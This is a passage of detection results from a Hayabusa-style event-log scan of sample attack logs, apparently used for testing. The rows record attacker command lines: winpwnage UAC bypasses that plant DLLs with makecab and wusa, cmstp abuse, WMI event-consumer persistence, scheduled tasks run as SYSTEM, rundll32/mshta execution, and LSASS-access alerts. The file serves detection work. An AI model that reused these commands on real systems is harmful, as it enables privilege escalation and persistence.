c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx -2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx -2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx -2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx -2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.340 +09:00,IEWIN7,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.418 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:39.746 +09:00,IEWIN7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.903 +09:00,IEWIN7,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:54.981 +09:00,IEWIN7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:55.090 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx -2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx -2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx -2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx -2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx -2019-05-12 22:56:12.652 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p 